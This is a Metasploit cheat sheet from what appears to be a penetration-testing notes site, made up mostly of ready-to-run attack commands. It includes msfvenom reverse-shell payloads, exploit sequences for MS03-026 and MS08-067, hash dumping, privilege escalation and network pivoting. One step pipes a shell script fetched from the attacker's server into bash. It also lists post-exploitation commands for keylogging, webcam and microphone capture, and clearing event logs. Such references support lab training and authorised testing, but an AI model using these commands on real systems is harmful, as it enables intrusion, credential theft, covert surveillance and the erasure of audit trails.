Metasploit

Set the payload:

set payload <path>

Set the exploit:

use exploit/<path>

Quick Commands

  • ctrl + z: Background a session

  • setg <name> <value>: Set global value

  • sessions -l: See background sessions

  • sessions -i <session num>: Go back into backgrounded sessions

  • options: Show parameters

  • hashdump: Dump hashes

  • unset payload: Clear payload

  • post/windows/gather/hashdump: Windows hashdump alt

  • ipconfig: Grab interface info

  • run autoroute -s <interfaceIP>/<Cidr Mask>: Network pivot

PHP web Meterpreter shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

HTA RSH

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f hta-psh -o thm.hta

# OR you can do it through Metasploit
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp

Easy WinXP pwn

IN the metasploit console:

use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/meterpreter/bind_tcp
set RHOST <xp machine IP>
exploit

Easy Win2000 pwn

IN the metasploit console:

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhost <Target IP>
set lhost <attacker IP>
set lport <attacker port>
exploit

Auxiliary Port Scan

# In the meterpreter shell of the infected machine
run autoroute -s <interfaceIP>/<Cidr Mask>
# Ctrl+Z to background she shell
auxiliary/scanner/portscan/tcp
set RHOSTS <pivot IP>/<Cidr Mask>
set ports <port 1>,<port 2>,<port n>
set threads 50
run

Privilege Escalation

To elevate your privilege you can use the commands:

use priv
getsystem

# OR
use exploit/windows/local/<technique>
# SET YOUR OPTIONS
exploit

Screen Capture:

# Elevate privlages
getsystem
# Load Library 
use espia
# Migrate to Explorer.exe
ps
migrate <pid of explorer.exe>
# Grabb Screenshot
screengrab

Linux Elevate Your Shell:

Generate your payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin

Start listener and server:

python3 -m http.server
nc -nlvp 1234

Use your unstable shell to download the stable shell bin:

curl <ip>:8000/shell.sh | bash

Start your meterpreter listener:

set payload linux/x86/meterpreter/reverse_tcp
use exploit/multi/handler
exploit

Download your meterpreter payload and run it:

curl -o /tmp/shell.bin <ip>:8000/shell.bin
chmod +x /tmp/shell.bin
cd /tmp
./shell.bin

Elevate the shell's permissions:

^Z
use post/multi/recon/local_exploit_suggester
exploit

Using the MFSDB and workspaces:

systemctl start postgresql
msfdb init
msfconsole
db_status

  • workspace: View workspace

  • workspace -a <workspace name>: Add a workspace

  • workspace -d <workspace name>: Delete a workspace

  • workspace <workspace name>: Change current workspace

  • workspace -h: Show workspace options

  • help: Show database commands

  • db_nmap <params> <ip>: Save nmap scan to db

  • hosts: Get host information

  • services: Get service information

  • hosts -R: Add hosts to RHOST param

  • services -S <service name>: Search for service in all hosts

Amazing THM Quick Reference command list:

Core commands

  • background: Backgrounds the current session

  • exit: Terminate the Meterpreter session

  • guid: Get the session GUID (Globally Unique Identifier)

  • help: Displays the help menu

  • info: Displays information about a Post module

  • irb: Opens an interactive Ruby shell on the current session

  • load: Loads one or more Meterpreter extensions

  • migrate: Allows you to migrate Meterpreter to another process

  • run: Executes a Meterpreter script or Post module

  • sessions: Quickly switch to another session

File system commands

  • cd: Will change directory

  • ls: Will list files in the current directory (dir will also work)

  • pwd: Prints the current working directory

  • edit: will allow you to edit a file

  • cat: Will show the contents of a file to the screen

  • rm: Will delete the specified file

  • search: Will search for files

  • upload: Will upload a file or directory

  • download: Will download a file or directory

Networking commands

  • arp: Displays the host ARP (Address Resolution Protocol) cache

  • ifconfig: Displays network interfaces available on the target system

  • netstat: Displays the network connections

  • portfwd: Forwards a local port to a remote service

  • route: Allows you to view and modify the routing table

System commands

  • clearev: Clears the event logs

  • execute: Executes a command

  • getpid: Shows the current process identifier

  • getuid: Shows the user that Meterpreter is running as

  • kill: Terminates a process

  • pkill: Terminates processes by name

  • ps: Lists running processes

  • reboot: Reboots the remote computer

  • shell: Drops into a system command shell

  • shutdown: Shuts down the remote computer

  • sysinfo: Gets information about the remote system, such as OS

Others Commands (these will be listed under different menu categories in the help menu)

  • idletime: Returns the number of seconds the remote user has been idle

  • keyscan_dump: Dumps the keystroke buffer

  • keyscan_start: Starts capturing keystrokes

  • keyscan_stop: Stops capturing keystrokes

  • screenshare: Allows you to watch the remote user's desktop in real time

  • screenshot: Grabs a screenshot of the interactive desktop

  • record_mic: Records audio from the default microphone for X seconds

  • webcam_chat: Starts a video chat

  • webcam_list: Lists webcams

  • webcam_snap: Takes a snapshot from the specified webcam

  • webcam_stream: Plays a video stream from the specified webcam

  • getsystem: Attempts to elevate your privilege to that of local system

  • hashdump: Dumps the contents of the SAM database

PreviousPhishingNextWeaponization

Last updated